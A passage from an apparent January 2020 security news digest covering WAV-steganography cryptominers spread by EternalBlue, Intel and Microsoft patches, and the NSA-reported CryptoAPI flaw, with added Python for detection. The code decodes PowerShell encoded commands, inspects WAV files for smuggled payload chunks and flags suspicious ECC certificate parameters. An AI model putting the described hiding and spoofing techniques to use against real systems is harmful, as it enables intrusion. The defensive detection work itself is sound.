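    """Sorted indicator names that fire on the command line and on its decoded script."""
    hits = [name for name, rx in CMDLINE_INDICATORS.items() if rx.search(cmdline)]
    script = decode_encoded_command(cmdline)
    if script:
        hits += [name for name, rx in SCRIPT_INDICATORS.items() if rx.search(script)]
    return sorted(hits)


if __name__ == "__main__":
    print(decode_encoded_command(SAMPLE_CMDLINE))
    print(triage(SAMPLE_CMDLINE))
```

The point of decoding before matching is that process-creation logs (Sysmon event 1, Windows event 4688) only show the Base64 blob, so a rule written against the plaintext script never fires on the raw command line; a truncated blob, as in the excerpt above, cannot be decoded at all, which is itself a reason to pull the full command line from the endpoint.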


The payload was a module that mines Monero cryptocurrency using the CryptonightR algorithm. To evade detection, the authors used steganography to embed it in WAV‌ audio files. As a result, the files seem harmless but carry an extra load that is later extracted and executed on an infected host.

This exact technique was reported on October 16 last year by researchers at BlackBerry Cylance, who said that some of the audio files could be played and “had no discernible quality issues or glitches.” Guardicore, however, saw it integrated into a full attack flow.

Another module hidden this way was tasked with scanning the network and with lateral movement. “The code implements the infamous EternalBlue exploit and spreads the malware over SMB,” reads Guardicore Lab Team’s analysis.
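As an added example (not Guardicore's tooling and not anything from the article), a RIFF/WAV chunk walker that surfaces the structural ways a loader can carry an extra payload in an audio file while a player still plays it: bytes appended after the declared RIFF end, chunks with non-standard ids, and chunks that claim more data than the file contains. The sample files are constructed in the code. The check does not see a payload hidden in the samples' least-significant bits, where the file structure stays intact, so treat it as first-pass triage rather than proof that a file is clean.

```python
import struct

KNOWN_CHUNKS = {"fmt", "data", "LIST", "fact"}  # common, legitimate WAV chunk ids


def _chunk(cid, payload):
    """RIFF chunk: 4-byte id, little-endian u32 size, payload padded to an even length."""
    pad = b"\0" if len(payload) & 1 else b""
    return cid + struct.pack("<I", len(payload)) + payload + pad


def build_wav(num_samples=8, extra_chunks=(), trailer=b""):
    """Constructed sample: a minimal 8-bit mono PCM WAV. extra_chunks smuggles a
    payload in a non-standard chunk; trailer appends bytes after the RIFF end."""
    pcm = bytes(128 + (i * 13) % 32 for i in range(num_samples))
    fmt = struct.pack("<HHIIHH", 1, 1, 8000, 8000, 1, 8)  # PCM, mono, 8 kHz, 8-bit
    body = _chunk(b"fmt ", fmt)
    for cid, payload in extra_chunks:
        body += _chunk(cid, payload)
    body += _chunk(b"data", pcm)
    return b"RIFF" + struct.pack("<I", 4 + len(body)) + b"WAVE" + body + trailer


def inspect_wav(blob):
    """Walk the chunk list and report structure a player ignores but a loader can use."""
    result = {"chunks": [], "trailing_bytes": 0, "findings": []}
    if len(blob) < 12 or blob[:4] != b"RIFF" or blob[8:12] != b"WAVE":
        result["findings"].append("not-a-riff-wave")
        return result
    declared_end = 8 + struct.unpack_from("<I", blob, 4)[0]
    if declared_end > len(blob):
        result["findings"].append("riff-size-exceeds-file")
    pos, truncated = 12, False
    while pos + 8 <= min(declared_end, len(blob)):
        cid = blob[pos:pos + 4].decode("latin-1").strip()
        size = struct.unpack_from("<I", blob, pos + 4)[0]
        end = pos + 8 + size
        if end > len(blob):
            result["findings"].append(f"chunk-{cid}-truncated")
            truncated = True
            break
        result["chunks"].append((cid, size))
        if cid not in KNOWN_CHUNKS:
            result["findings"].append(f"unknown-chunk-{cid}")
        pos = end + (size & 1)  # chunks are word-aligned
    if not truncated:
        # Anything past the last chunk is invisible to an audio player.
        result["trailing_bytes"] = len(blob) - pos
        if result["trailing_bytes"]:
            result["findings"].append("data-after-riff")
    return result
```

Run it over the audio files an EDR reports as read by an unexpected process; a WAV with a data-after-riff finding of tens of kilobytes, or an unknown chunk id, is worth carving and scanning as its own artifact.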

Weak spots
While this attack is not sophisticated, it shows that some mid-size organizations are ill-prepared to defend against a security incident and have not set up their environment to support post-infection analysis.

In this particular case, the victim company used Windows 7, an operating system that on Tuesday received its last batch of updates and is no longer supported by Microsoft.

This may not have been relevant to the attack itself, but leaving the systems unpatched against EternalBlue for almost three years is what provided the opportunity to spread to over 50% of the computers on the network.

Guardicore hit some bumps during the investigation because the computers analyzed had not been configured to save kernel memory dumps, “which could have been helpful in forensics analysis and in understanding the root cause of the [BSOD] errors.”


Intel Patches High Severity Flaw in VTune Performance Profiler
20.1.2020 
Bleepingcomputer  Vulnerebility

Intel patched six security vulnerabilities during the January 2020 Patch Tuesday, including a high severity vulnerability in VTune and a bug affecting the Intel Processor Graphics drivers for Windows and Linux.

The security issues addressed today are detailed in the six security advisories published on Intel's Product Security Center.

According to Intel, these vulnerabilities could allow authenticated users to potentially trigger denial of service states and escalate privileges via local access, while others could lead to information disclosure.

"This month, consistent with our commitment to transparency, we are releasing 6 security advisories addressing 6 vulnerabilities," Intel's Director of Security Communications Jerry Bryant said.

"Three of these, including the one with the highest CVSS severity rating of 8.2, were internally found by Intel, and the others were reported through our Bug Bounty program."

Intel's January 2020 Patch Tuesday advisories
Below you can find all the advisories published by Intel during 2020's first Patch Tuesday, together with links to download pages where you can get the updates needed to patch the security flaws.

While Intel says that they are not aware of any of the security issues being exploited in the wild, users are advised to install the updates as soon as possible.

Out of the six vulnerabilities patched today, two stand out. The first, tracked as CVE-2019-14613, is a high severity flaw in the Intel VTune Amplifier for Windows that may allow an authenticated local attacker to escalate privileges.

The other is a medium severity information disclosure flaw, tracked as CVE-2019-14615, that affects the Windows and Linux graphics drivers for a wide range of processors, including the company's latest 10th Generation 'Ice Lake' Intel Core processors.

Advisory Number Advisory CVE ID Severity rating Updates
INTEL-SA-00325 Intel VTUNE CVE-2019-14613 8.2 DOWNLOAD
INTEL-SA-00308 Intel RWC 3 for Windows CVE-2019-14601 6.7 DOWNLOAD
INTEL-SA-00300 Intel SNMP Subagent Stand-Alone for Windows CVE-2019-14600 6.5 DISCONTINUED
INTEL-SA-00314 Intel Processor Graphics CVE-2019-14615 6.3 DOWNLOAD
INTEL-SA-00306 Intel Chipset Device Software INF Utility CVE-2019-14596 5.9 DOWNLOAD
INTEL-SA-00332 Intel DAAL CVE-2019-14629 3.9 DOWNLOAD
"Intel has released security updates to address vulnerabilities in multiple products," the Cybersecurity and Infrastructure Security Agency (CISA) said today in a notification. "An authenticated attacker with local access could exploit some of these vulnerabilities to gain escalation of privileges."

The agency encourages both users and administrators to review the security advisories published today by Intel and apply the necessary updates to defend against potential exploitation attempts.

Each of the linked advisories comes with a detailed list of all affected products and recommendations for vulnerable products, as well as contact info for users and researchers who would want to report other vulnerabilities found in Intel branded tech or products.


Windows Terminal Adds Retro CRT Effects and Console Search
20.1.2020 
Bleepingcomputer  OS

Microsoft released Windows Terminal Preview v0.8 today, and with it come useful improvements that include a console search feature, tab sizing, and a new retro option that makes consoles look like an old CRT.

The Windows Terminal app is a new multi-tab console application being developed by Microsoft that allows users to have multiple console tabs open in one window. These tabs can be a mix of CMD prompts, PowerShell consoles, and different shells from Linux distributions installed via the Windows Subsystem for Linux (WSL).

Below we have outlined the major features added in this build.

New Search feature
With this release, users can now search for text within an open console window by using the Ctrl+Shift+F keyboard combination.

New search feature
If you are like me and wish the Find feature used the Ctrl+F keyboard combination, you can change it by adding a new keybinding like the following:

"keybindings": [
{ "command": "find", "keys": [ "ctrl+f" ] }
]
New Tab width setting
By default, Windows Terminal will display equal width tabs for every open tab.

Version 0.8 introduces a new tabWidthMode global setting that can be set to either 'equal' or 'titleLength'. If set to titleLength, each tab is sized to the length of its title (plus a little padding), as shown below.

New tabWidthMode setting
Retro
Finally, Microsoft added a fun experimental feature that emulates a retro CRT when displaying the console.

This feature is controlled by the 'experimental.retroTerminalEffect' profile setting which, when set to true, makes the fonts glow and adds scanlines to the console.

This is illustrated in a Linux shell running Midnight Commander below.

New retro mode with scanlines and glowing fonts
To enable the retro Terminal effect, you can add the following setting to a profile:

"experimental.retroTerminalEffect": true,
For the above example, Windows Terminal Program Manager Kayla Cinnamon told BleepingComputer that she set her "color scheme to Vintage and am using the PxPlus IBM VGA8 font from here: https://int10h.org/oldschool-pc-f."

For those who do not have the Vintage color scheme, it is:

{
"name": "Vintage",
"foreground": "#C0C0C0",
"background": "#000000",
"black": "#000000",
"red": "#800000",
"green": "#008000",
"yellow": "#808000",
"blue": "#000080",
"purple": "#800080",
"cyan": "#008080",
"white": "#C0C0C0",
"brightBlack": "#808080",
"brightRed": "#FF0000",
"brightGreen": "#00FF00",
"brightYellow": "#FFFF00",
"brightBlue": "#0000FF",
"brightPurple": "#FF00FF",
"brightCyan": "#00FFFF",
"brightWhite": "#FFFFFF"
}
More information about these settings and other changes can be read in v0.8's release notes.


NSA's First Public Vulnerability Disclosure: An Effort to Build Trust
20.1.2020 
Bleepingcomputer  BigBrothers

The U.S. National Security Agency (NSA) started a new chapter after discovering and reporting to Microsoft a vulnerability tracked as CVE-2020-0601 and impacting Windows 10 and Windows Server systems.

In a phone conference that Bleeping Computer joined, NSA's Director of Cybersecurity Anne Neuberger said that this is the first time the agency decided to publicly disclose a security vulnerability to a software vendor.

"We thought hard about that. When Microsoft asked us, 'Can we attribute this vulnerability to NSA?' we gave it a great deal of thought. And then we elected to do so and here is why," Neuberger explained.

She added that "part of building trust is showing the data" and, as a result, "it's hard for entities to trust that we indeed take this seriously and ensuring that vulnerabilities can be mitigated is an absolute priority."

Neuberger also said during the media call that the agency will make efforts towards becoming an ally to the cybersecurity community and private sector entities, and will begin to share vulnerability data with its partners instead of accumulating it and using it in future offensive operations.

"Sources say this disclosure from NSA is planned to be the first of many as part of a new initiative at NSA dubbed 'Turn a New Leaf,' aimed at making more of the agency's vulnerability research available to major software vendors and ultimately to the public," journalist Brian Krebs reported.

NSA redefining itself
"We believe in Coordinated Vulnerability Disclosure (CVD) as proven industry best practice to address security vulnerabilities," MSRC's Principal Security Program Manager Mechele Gruhn added.

"Through a partnership between security researchers and vendors, CVD ensures vulnerabilities are addressed prior to being made public."

NSA's new approach to building trust with the public and its partners redefines the agency's cybersecurity mission as US Army General and NSA Director Paul M. Nakasone stated in July 2019.

"The Cybersecurity Directorate will reinvigorate our white hat mission opening the door to partners and customers on a wide variety of cybersecurity efforts," he added at the time.

"It will also build on our past successes such as Russia Small Group to operationalize our threat intelligence, vulnerability assessments, and cyber defense expertise to defeat our adversaries in cyberspace."

The NSA-reported vulnerability
The CVE-2020-0601 spoofing vulnerability reported by the NSA affects the Windows CryptoAPI and is caused by the way Elliptic Curve Cryptography (ECC) certificates are validated.

"The certificate validation vulnerability allows an attacker to undermine how Windows verifies cryptographic trust and can enable remote code execution," the NSA says.

CVE-2020-0601 hasn't yet been exploited in the wild according to Microsoft's security advisory, and the US agency advises users and organizations to install the patches released as part of Microsoft's January 2020 Patch Tuesday as soon as possible to block attackers from defeating "trusted network connections and deliver executable code while appearing as legitimately trusted entities."

NSA/CSS (@NSAGov), 7:31 PM - Jan 14, 2020:
"This #PatchTuesday you are strongly encouraged to implement the recently released CVE-2020-0601 patch immediately. https://media.defense.gov/2020/Jan/14/2002234275/-1/-1/0/CSA-WINDOWS-10-CRYPT-LIB-20190114.PDF"
"This vulnerability is one example of our partnership with the security research community where a vulnerability was privately disclosed and an update released to ensure customers were not put at risk," Gruhn added.

The NSA security advisory also includes mitigation measures for systems where installing the patches released by Microsoft today is not immediately possible.

"Properly configured and managed TLS inspection proxies independently validate TLS certificates from external entities and will reject invalid or untrusted certificates, protecting endpoints from certificates that attempt to exploit the vulnerabilities," the agency reveals.

"Ensure that certificate validation is enabled for TLS proxies to limit exposure to this class of vulnerabilities and review logs for signs of exploitation."

The consequences of not patching the vulnerability are severe and widespread. Remote exploitation tools will likely be made quickly and widely available. Rapid adoption of the patch is the only known mitigation at this time and should be the primary focus for all network owners. - NSA


Windows 7 Gets Final Monthly Rollup Update Before End Of Life
20.1.2020 
Bleepingcomputer  Vulnerebility

Windows 7 has just received its last set of security updates. After today, Windows 7 won't receive any security or non-security updates from Microsoft, and it is now considered an unsupported operating system.

The final monthly rollup for Windows 7 comes with a number of security fixes. Microsoft says KB4534310 for Windows 7 resolves security issues affecting Windows Cryptography, Windows Input and Composition, Windows Management, and other components.

The full changelog of the update includes:

Security updates to Windows App Platform and Frameworks, Windows Input and Composition, Windows Management, Windows Cryptography, Windows Storage and Filesystems, the Microsoft Scripting Engine, and Windows Server.
Microsoft has also published Servicing Stack Update (SSU) KB4536952 to improve Windows Update performance on Windows 7.

The last update for Windows 7 applies to all of its editions and versions, including Windows 7 Service Pack 1, Windows Server 2008 R2 Service Pack 1, Windows Embedded Standard 7 Service Pack 1, Windows Embedded POSReady 7, and Windows Thin PC.

You can download and install the latest patches by checking for updates in Control Panel. You can also grab the offline installer by downloading the package from the Microsoft Update website.

Windows 7 EoL
After January 14, devices running Windows 7 will need to be upgraded to Windows 10 for continued support, updates and patches from Microsoft. Consumers and businesses that keep using Windows 7 past its EoL (End of Life) will miss out on the latest technologies, apps, security updates, and support.

In a support doc, Microsoft has stated that it will display a full-screen upgrade warning notification on Windows 7 PCs from January 15. The notification will remain on the screen until you interact with it on your PC running:

Starter.
Home Basic.
Home Premium.
Professional (No such notifications if you have purchased the Extended Security Update).
Ultimate.
It's also important to note that Microsoft has never blocked the free upgrades to Windows 10, and you can upgrade to Windows 10 today for free by following our guide.

Windows 7 Extended Security Updates (ESUs)
Companies, organizations and small businesses may pay Microsoft to extend support by up to three years. According to Microsoft's Windows 7 ESU policy, enterprise customers pay up to $50, $100, and $200 per device for the first, second and third year respectively to keep getting security updates for Windows 7 Pro or Enterprise.

Security company 0Patch is also planning to release security updates for Windows 7 for free in the coming weeks.


Microsoft's January 2020 Patch Tuesday Fixes 49 Vulnerabilities
20.1.2020 
Bleepingcomputer  Vulnerebility

Today is Microsoft's January 2020 Patch Tuesday and also the Windows 7 end of life. This is going to be a stressful day for your Windows administrators, so be nice!

With the release of the January 2020 security updates, Microsoft has released fixes for 49 vulnerabilities. Of these vulnerabilities, 7 are classified as Critical, 41 as Important, and 1 as Moderate.

The most notable vulnerability fixed today, which Microsoft rates 'Important' but the NSA describes as severe, was discovered by the NSA and could allow attackers to spoof digital certificates or perform man-in-the-middle (MiTM) attacks.

More information about the 'CVE-2020-0601 - Windows CryptoAPI Spoofing' vulnerability can be found below and in our dedicated article: Microsoft Fixes Windows CryptoAPI Spoofing Flaw Reported by NSA.

The good news is that there were no vulnerabilities publicly disclosed or found being actively exploited in the wild.

Users should still install these security updates as soon as possible to protect Windows from known security risks.

For information about the non-security Windows updates, you can read about today's Windows 10 January 2020 Cumulative Updates.

CVE-2020-0601 - Windows CryptoAPI Spoofing Vulnerability
The big news of the day is the first Windows vulnerability publicly attributed as discovered by the United States' National Security Agency (NSA).

While more detailed information is found in our dedicated article, this Patch Tuesday security update article would not be complete without a summary of the vulnerability.

The CVE-2020-0601 vulnerability is a flaw in how the Windows CryptoAPI (Crypt32.dll) validates Elliptic Curve Cryptography (ECC) certificates.

Using this flaw attackers could cause malware to appear as code-signed by legitimate companies, conduct man-in-the-middle attacks, and decrypt encrypted information over network connections.

This is a critical vulnerability and all Windows users are advised to install this patch immediately.
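Both this summary and the NSA article above describe CVE-2020-0601 as a flaw in how Crypt32.dll validates ECC certificates. As an added illustration of a check a defender can run against the certificates they see (this is not code from Microsoft, from the NSA, or from the article): the NSA advisory linked above singles out certificates whose elliptic-curve parameters are written out explicitly instead of naming a standard curve by OID, and in particular explicit parameters that only partially match a standard curve. This Python walks a certificate's SubjectPublicKeyInfo, reports whether the EC parameters are a named curve or explicit, and for explicit ones compares each field against P-256. The DER encoder, the sample keys and the non-standard generator are constructed here for the demonstration; the P-256 constants are the published ones; only P-256 is compared, and the code does not check that points lie on the curve.

```python
ID_EC_PUBLIC_KEY = "1.2.840.10045.2.1"
PRIME_FIELD = "1.2.840.10045.1.1"
NAMED_CURVES = {"1.2.840.10045.3.1.7": "secp256r1", "1.3.132.0.34": "secp384r1"}
# Published P-256 (secp256r1) domain parameters (FIPS 186-4 / SEC 2).
P256 = {
    "p": 0xffffffff00000001000000000000000000000000ffffffffffffffffffffffff,
    "a": 0xffffffff00000001000000000000000000000000fffffffffffffffffffffffc,
    "b": 0x5ac635d8aa3a93e7b3ebbd55769886bc651d06b0cc53b0f63bce3c3e27d2604b,
    "gx": 0x6b17d1f2e12c4247f8bce6e563a440f277037d812deb33a0f4a13945d898c296,
    "gy": 0x4fe342e2fe1a7f9b8ee7eb4a7c0f9e162bce33576b315ececbb6406837bf51f5,
    "n": 0xffffffff00000000ffffffffffffffffbce6faada7179e84f3b9cac2fc632551,
}

# Minimal DER encoder, used only to construct the sample SubjectPublicKeyInfos.
def _tlv(tag, body):
    n = len(body)
    if n < 0x80:
        return bytes([tag, n]) + body
    lb = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(lb)]) + lb + body

def _der_int(v):  # the spare byte keeps the sign bit clear for 256-bit values
    return _tlv(0x02, v.to_bytes((v.bit_length() + 8) // 8, "big"))

def _der_oid(dotted):
    parts = [int(x) for x in dotted.split(".")]
    out = bytearray([40 * parts[0] + parts[1]])
    for v in parts[2:]:
        groups = [v & 0x7F]
        v >>= 7
        while v:
            groups.append(0x80 | (v & 0x7F))
            v >>= 7
        out += bytes(reversed(groups))
    return _tlv(0x06, bytes(out))

def _point(curve):  # uncompressed SEC 1 point with 32-byte coordinates
    return b"\x04" + curve["gx"].to_bytes(32, "big") + curve["gy"].to_bytes(32, "big")

def explicit_params(curve):
    """ECParameters SEQUENCE (RFC 5480 / SEC 1) with every field spelled out."""
    field = _tlv(0x30, _der_oid(PRIME_FIELD) + _der_int(curve["p"]))
    equation = _tlv(0x30, _tlv(0x04, curve["a"].to_bytes(32, "big"))
                    + _tlv(0x04, curve["b"].to_bytes(32, "big")))
    return _tlv(0x30, _der_int(1) + field + equation + _tlv(0x04, _point(curve))
                + _der_int(curve["n"]) + _der_int(1))

def build_spki(params_der, alg_oid=ID_EC_PUBLIC_KEY):
    """SubjectPublicKeyInfo around the given parameters; the key bits are a dummy."""
    alg = _tlv(0x30, _der_oid(alg_oid) + params_der)
    return _tlv(0x30, alg + _tlv(0x03, b"\x00" + _point(P256)))

# Minimal DER reader.
def _read_tlv(buf, pos=0):
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + length], pos + length

def _children(body):
    out, pos = [], 0
    while pos < len(body):
        tag, value, pos = _read_tlv(body, pos)
        out.append((tag, value))
    return out

def _decode_oid(body):
    parts, value = [body[0] // 40, body[0] % 40], 0
    for b in body[1:]:
        value = (value << 7) | (b & 0x7F)
        if not b & 0x80:
            parts.append(value)
            value = 0
    return ".".join(map(str, parts))

def classify_ec_params(spki_der):
    """Return (label, per-field match against P-256). A partial match, typically the
    standard prime and order with a non-standard generator, is the suspicious case."""
    fields = _children(_children(_read_tlv(spki_der)[1])[0][1])  # AlgorithmIdentifier
    if _decode_oid(fields[0][1]) != ID_EC_PUBLIC_KEY:
        return "not-ec", {}
    if len(fields) < 2:
        return "missing-parameters", {}
    ptag, pbody = fields[1]
    if ptag == 0x06:  # namedCurve OID: the normal, safe form
        oid = _decode_oid(pbody)
        return "named-curve:" + NAMED_CURVES.get(oid, oid), {}
    if ptag != 0x30:
        return "implicit-or-unknown-parameters", {}
    field, equation, base, order = _children(pbody)[1:5]
    seen = {"p": int.from_bytes(_children(field[1])[1][1], "big"),
            "a": int.from_bytes(_children(equation[1])[0][1], "big"),
            "b": int.from_bytes(_children(equation[1])[1][1], "big"),
            "g": base[1],
            "n": int.from_bytes(order[1], "big")}
    expected = dict(P256, g=_point(P256))
    matches = {k: seen[k] == expected[k] for k in seen}
    if all(matches.values()):
        return "explicit-parameters:full-match-P-256", matches
    if any(matches.values()):
        return "explicit-parameters:partial-match-P-256", matches
    return "explicit-parameters:unknown-curve", matches
```

In practice you would feed this the SubjectPublicKeyInfo pulled from real certificates (for example from a TLS proxy's logs or a code-signing chain) rather than the constructed samples; a full match is merely unusual, while a partial match deserves the same response the NSA advisory gives it: treat the certificate as untrusted and look for where it was used.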

Critical Windows Remote Desktop Gateway vulnerabilities
The January 2020 Patch Tuesday also fixes three vulnerabilities in the Windows Remote Desktop Gateway (RD Gateway).

Two of the vulnerabilities (CVE-2020-0609 and CVE-2020-0610) could allow an unauthenticated attacker to perform remote code execution on a vulnerable system.

"A remote code execution vulnerability exists in Windows Remote Desktop Gateway (RD Gateway) when an unauthenticated attacker connects to the target system using RDP and sends specially crafted requests. This vulnerability is pre-authentication and requires no user interaction. An attacker who successfully exploited this vulnerability could execute arbitrary code on the target system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.

To exploit this vulnerability, an attacker would need to send a specially crafted request to the target systems RD Gateway via RDP."

The third vulnerability (CVE-2020-0612) could allow an attacker to perform a denial of service (DoS) attack against an RD Gateway and cause it to stop responding.

"A denial of service vulnerability exists in Windows Remote Desktop Gateway (RD Gateway) when an attacker connects to the target system using RDP and sends specially crafted requests. An attacker who successfully exploited this vulnerability could cause the RD Gateway service on the target system to stop responding."

If you use RD Gateway in your organization you must install this update.

The January 2020 Patch Tuesday Security Updates
Below is the full list of resolved vulnerabilities and released advisories in the January 2020 Patch Tuesday updates. To access the full description of each vulnerability and the systems that it affects, you can view the full report here.

Tag CVE ID CVE Title Severity
.NET Framework CVE-2020-0606 .NET Framework Remote Code Execution Vulnerability Critical
.NET Framework CVE-2020-0605 .NET Framework Remote Code Execution Vulnerability Critical
.NET Framework CVE-2020-0646 .NET Framework Remote Code Execution Injection Vulnerability Critical
Apps CVE-2020-0654 Microsoft OneDrive for Android Security Feature Bypass Vulnerability Important
ASP.NET CVE-2020-0603 ASP.NET Core Remote Code Execution Vulnerability Critical
ASP.NET CVE-2020-0602 ASP.NET Core Denial of Service Vulnerability Important
Common Log File System Driver CVE-2020-0615 Windows Common Log File System Driver Information Disclosure Vulnerability Important
Common Log File System Driver CVE-2020-0634 Windows Common Log File System Driver Elevation of Privilege Vulnerability Important
Common Log File System Driver CVE-2020-0639 Windows Common Log File System Driver Information Disclosure Vulnerability Important
Microsoft Dynamics CVE-2020-0656 Microsoft Dynamics 365 (On-Premise) Cross Site Scripting Vulnerability Important
Microsoft Graphics Component CVE-2020-0622 Microsoft Graphics Component Information Disclosure Vulnerability Important
Microsoft Graphics Component CVE-2020-0607 Microsoft Graphics Components Information Disclosure Vulnerability Important
Microsoft Graphics Component CVE-2020-0642 Win32k Elevation of Privilege Vulnerability Important
Microsoft Graphics Component CVE-2020-0643 Windows GDI+ Information Disclosure Vulnerability Important
Microsoft Office CVE-2020-0650 Microsoft Excel Remote Code Execution Vulnerability Important
Microsoft Office CVE-2020-0652 Microsoft Office Memory Corruption Vulnerability Important
Microsoft Office CVE-2020-0653 Microsoft Excel Remote Code Execution Vulnerability Important
Microsoft Office CVE-2020-0651 Microsoft Excel Remote Code Execution Vulnerability Important
Microsoft Office CVE-2020-0647 Microsoft Office Online Spoofing Vulnerability Important
Microsoft Scripting Engine CVE-2020-0640 Internet Explorer Memory Corruption Vulnerability Moderate
Microsoft Windows CVE-2020-0644 Windows Elevation of Privilege Vulnerability Important
Microsoft Windows CVE-2020-0624 Win32k Elevation of Privilege Vulnerability Important
Microsoft Windows CVE-2020-0635 Windows Elevation of Privilege Vulnerability Important
Microsoft Windows CVE-2020-0620 Microsoft Cryptographic Services Elevation of Privilege Vulnerability Important
Microsoft Windows CVE-2020-0616 Microsoft Windows Denial of Service Vulnerability Important
Microsoft Windows CVE-2020-0608 Win32k Information Disclosure Vulnerability Important
Microsoft Windows CVE-2020-0601 Windows CryptoAPI Spoofing Vulnerability Important
Microsoft Windows CVE-2020-0621 Windows Security Feature Bypass Vulnerability Important
Microsoft Windows Search Component CVE-2020-0633 Windows Search Indexer Elevation of Privilege Vulnerability Important
Microsoft Windows Search Component CVE-2020-0623 Windows Search Indexer Elevation of Privilege Vulnerability Important
Microsoft Windows Search Component CVE-2020-0613 Windows Search Indexer Elevation of Privilege Vulnerability Important
Microsoft Windows Search Component CVE-2020-0614 Windows Search Indexer Elevation of Privilege Vulnerability Important
Microsoft Windows Search Component CVE-2020-0632 Windows Search Indexer Elevation of Privilege Vulnerability Important
Microsoft Windows Search Component CVE-2020-0627 Windows Search Indexer Elevation of Privilege Vulnerability Important
Microsoft Windows Search Component CVE-2020-0628 Windows Search Indexer Elevation of Privilege Vulnerability Important
Microsoft Windows Search Component CVE-2020-0625 Windows Search Indexer Elevation of Privilege Vulnerability Important
Microsoft Windows Search Component CVE-2020-0626 Windows Search Indexer Elevation of Privilege Vulnerability Important
Microsoft Windows Search Component CVE-2020-0629 Windows Search Indexer Elevation of Privilege Vulnerability Important
Microsoft Windows Search Component CVE-2020-0631 Windows Search Indexer Elevation of Privilege Vulnerability Important
Microsoft Windows Search Component CVE-2020-0630 Windows Search Indexer Elevation of Privilege Vulnerability Important
Windows Hyper-V CVE-2020-0617 Hyper-V Denial of Service Vulnerability Important
Windows Media CVE-2020-0641 Microsoft Windows Elevation of Privilege Vulnerability Important
Windows RDP CVE-2020-0610 Windows Remote Desktop Gateway (RD Gateway) Remote Code Execution Vulnerability Critical
Windows RDP CVE-2020-0609 Windows Remote Desktop Gateway (RD Gateway) Remote Code Execution Vulnerability Critical
Windows RDP CVE-2020-0637 Remote Desktop Web Access Information Disclosure Vulnerability Important
Windows RDP CVE-2020-0612 Windows Remote Desktop Gateway (RD Gateway) Denial of Service Vulnerability Important
Windows RDP CVE-2020-0611 Remote Desktop Client Remote Code Execution Vulnerability Critical
Windows Subsystem for Linux CVE-2020-0636 Windows Subsystem for Linux Elevation of Privilege Vulnerability Important
Windows Update Stack CVE-2020-0638 Update Notification Manager Elevation of Privilege Vulnerability Important


Windows 10 Cumulative Updates KB4528760 & KB4534273 Released
20.1.2020 
Bleepingcomputer  Vulnerebility

Windows 10's January 2020 cumulative updates are now rolling out with important fixes for Windows 10 November 2019 Update, May 2019 Update, and October 2018 Update.

Like every other cumulative update, the January 14 cumulative updates for Windows 10 versions 1909, 1903, and 1809 include security fixes for core components as well as for Windows Cryptography.

To grab the update, go to the Windows Update page and click on the 'Check for updates' button to install the patches. If you own multiple PCs or if you would like to patch the PCs manually, you can learn more about it here.

Builds 18362.592 and 18363.592
If you are using the November 2019 Update, you'll be getting 18363.592 (KB4528760). Those who are using Windows 10 May 2019 Update will receive Build 18362.592 with the following changes:

Security updates to Windows App Platform and Frameworks, Windows Input and Composition, Windows Management, Windows Cryptography, Windows Storage and Filesystems, the Microsoft Scripting Engine, and Windows Server.
The update also improves security when storing and managing files and when using input devices such as a mouse or keyboard.

Build 17763.973
Windows 10 KB4534273 (Build 17763.973) for Windows 10 version 1809, Windows Server version 1809, and Windows Server 2019 comes with the following bug fixes:

Addresses an issue to support new SameSite cookie policies by default for release 80 of Google Chrome.
Security updates to Windows App Platform and Frameworks, Windows Input and Composition, Windows Management, Windows Cryptography, Windows Virtualization, the Microsoft Scripting Engine, and Windows Server.
Known issues in this update

Symptom: Certain operations, such as rename, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, "STATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)". This occurs when you perform the operation on a CSV owner node from a process that doesn't have administrator privilege.
Workaround: Do one of the following:
Perform the operation from a process that has administrator privilege.
Perform the operation from a node that doesn't have CSV ownership.
Microsoft is working on a resolution and will provide an update in an upcoming release.

Symptom: After installing KB4493509, devices with some Asian language packs installed may receive the error, "0x800f0982 - PSFX_E_MATCHING_COMPONENT_NOT_FOUND."
Workaround:
Uninstall and reinstall any recently added language packs. For instructions, see Manage the input and display language settings in Windows 10.
Select Check for Updates and install the April 2019 Cumulative Update. For instructions, see Update Windows 10.
Note: If reinstalling the language pack does not mitigate the issue, reset your PC as follows:
Go to the Settings app > Recovery.
Select Get Started under the Reset this PC recovery option.
Select Keep my Files.
Microsoft is working on a resolution and will provide an update in an upcoming release.

Symptom: When setting up a new Windows device during the Out of Box Experience (OOBE), you might be unable to create a local user when using Input Method Editor (IME). This issue might affect you if you are using the IME for Chinese, Japanese, or Korean languages.
Note: This issue does not affect using a Microsoft Account during OOBE.
Workaround: To mitigate this issue, set the keyboard language to English during user creation or use a Microsoft Account to complete OOBE. You can set the keyboard language back to your preferred language after user creation. Once the OOBE is done and you are at the desktop, you can rename the current user using these instructions. If you prefer to create a new local user, see KB4026923.
Microsoft is working on a resolution and will provide an update in an upcoming release.


Microsoft Fixes Windows CryptoAPI Spoofing Flaw Reported by NSA
20.1.2020 
Bleepingcomputer  Vulnerebility

Microsoft patched a spoofing vulnerability present in the Windows usermode cryptographic library, CRYPT32.DLL, on Windows 10, Windows Server 2016, and Windows Server 2019 systems.

In a media call that BleepingComputer joined, the National Security Agency (NSA) stated that it discovered this vulnerability and immediately reported it to Redmond's security team.

Both NSA and Microsoft say that the vulnerability hasn't yet been exploited in the wild, while the agency recommends in its own advisory to install the patches delivered with Microsoft's January 2020 Patch Tuesday as soon as possible to block attackers from defeating "trusted network connections and deliver executable code while appearing as legitimately trusted entities."

In its second-ever Emergency Directive, DHS' Cybersecurity and Infrastructure Security Agency (CISA) also "strongly recommends agencies initiate patching immediately, with a focus on patching the Windows 10 and Server 2016/2019 systems impacted by CVE-2020-0601.

Agencies should prioritize patching mission-critical systems and High-Value Assets (HVAs), internet-accessible systems, and servers. Agencies should then apply the patch to the remaining endpoints."

The consequences of not patching the vulnerability are severe and widespread. Remote exploitation tools will likely be made quickly and widely available. Rapid adoption of the patch is the only known mitigation at this time and should be the primary focus for all network owners. - NSA

Spoofing ECC certificate chains' validity
